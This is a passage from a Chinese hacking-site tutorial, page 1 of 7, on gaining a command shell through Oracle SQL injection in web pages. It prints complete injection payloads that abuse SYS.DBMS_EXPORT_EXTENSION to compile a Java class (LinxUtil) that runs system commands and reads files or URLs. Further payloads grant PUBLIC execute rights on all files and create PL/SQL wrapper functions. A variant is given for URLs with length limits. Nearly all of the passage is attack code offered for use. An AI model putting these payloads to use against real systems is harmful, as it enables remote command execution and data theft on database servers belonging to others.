·	没有路由密码权限时的鸽	08-23	·	犀利的 oracle 注入技术	10-18
·	十个技巧提升你的IE8使用	10-18	·	Orbitfiles提供6G免费网	10-18
·	FreeMySQL提供MySQL数据	10-18	·	服务器访问帐号设置要安	10-17
·	ZhengTu盗号马bdscheca0	10-17	·	系统安全从定制IP策略开	10-17
·	从黑客常用的攻击手段分	10-17	·	几秒钟自定制XP启动画面	10-17
·	文件批量重命名 Win XP自	10-17	·	Trojan-Dropper.Win32.A	10-17
·	突破FSO限制夺取系统权限	10-17	·	笔记本电脑用户应如何选	10-17
·	XSS测试语法大全	10-17	·	脱壳的入门教程	10-17
·	只需两招轻松识破QQ安全	10-17	·	BAT延时执行命令的三种方	10-17
·	安全顾问教你如何安全使	10-17	·	千脑提供500M免费WebOS网	10-17
·	Graffiti提供20M免费静态	10-17	·	FreeUnlimitedWeb提供无	10-16
·	假如对方是个BT 之 \ 被	10-15	·	mysql注入检测工具	10-15
·	入侵中用到的三大门派的	10-15	·	Power Mixer 系统音量随	10-15
·	妙用Vista的任务计划解除	10-15	·	善用外力，让Vista系统功	10-15

[推荐]犀利的 oracle 注入技术

荐 ★★★★★

犀利的 oracle 注入技术

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-10-18 11:18:02

介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。

以下的演示都是在web上的sql plus执行的，在web注入时把select SYS.DBMS_EXPORT_EXTENSION.....改成

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用" 'a'|| "是为了让语句返回true值)

语句有点长，可能要用post提交。

以下是各个步骤：

1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：

以下是引用片段：
/xxx.jsp?id=1 and ’1’<>’a’||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual
)
************
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new FileReader(filename));
String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual
***************
------------------------
如果url有长度限制，可以把readFile()函数块去掉，即：
/xxx.jsp?id=1 and ’1’<>’a’||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual
)

同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------

2.赋Java权限

以下是引用片段：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’begin dbms_java.grant_permission( ’’’’’’’’PUBLIC’’’’’’’’, ’’’’’’’’SYS:java.io.FilePermission’’’’’’’’, ’’’’’’’’<<ALL FILES>>’’’’’’’’, ’’’’’’’’execute’’’’’’’’ );end;’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual

3.创建函数

以下是引用片段：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ’’’’’’’’LinxUtil.runCMD(java.lang.String) return String’’’’’’’’; ’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ’’’’
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ’’’’’’’’LinxUtil.readFile(java.lang.String) return String’’’’’’’’; ’’’’;END;’’;END;--’,’SYS’,0,’1’,0) from dual

[1] [2] [3] [4] [5] [6] [7] 下一页

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：突破FSO限制夺取系统权限

下一篇文章：没有了

【字体：小大】

中介交易区

最新热门

一次通过 Oracle8i 入侵系统之旅 03-21
SA权限下的思路变通 03-18
有防火墙的网站整个入侵过程 01-21
绕过Xplog70.dll玩入侵 01-14
一步一步的入侵----only for you 01-09
入侵中快速获得Web根目录的技巧 01-09
记一次对RedHat Linux系统的安全 01-08
介绍几个小工具和入侵的技法(2) 01-08
有防火墙的网站整个入侵过程 01-04
拐弯入侵虚拟主机 01-04
由一次入侵实例看虚拟主机系统的 01-02
解读IDS入侵检测系统术语 01-02

相关文章

mysql注入检测工具
 ORACLE建立数据文件WriteWebShell
PhpCms2007 sp6 SQL漏洞注入0day代码
 EmpireCMS47 SQL注入漏洞利用代码
 动网Dvbbs·php 2.0++ Blind SQL注入漏
 ACCESS高级注入教程
 PhpBazar adid SQL注入漏洞
 Discuz!NT 2.5（20080826更新前）注入
 MYSQL 注入精华
 SQL注入原理深度解析
 dedecms tag.php注入漏洞分析与利用
 风迅Fusion 'readmore.php' SQ

一次通过 Oracle8i 入侵系统之旅	03-21
SA权限下的思路变通	03-18
有防火墙的网站整个入侵过程	01-21
绕过Xplog70.dll玩入侵	01-14
一步一步的入侵----only for you	01-09
入侵中快速获得Web根目录的技巧	01-09
记一次对RedHat Linux系统的安全	01-08
介绍几个小工具和入侵的技法(2)	01-08
有防火墙的网站整个入侵过程	01-04
拐弯入侵虚拟主机	01-04
由一次入侵实例看虚拟主机系统的	01-02
解读IDS入侵检测系统术语	01-02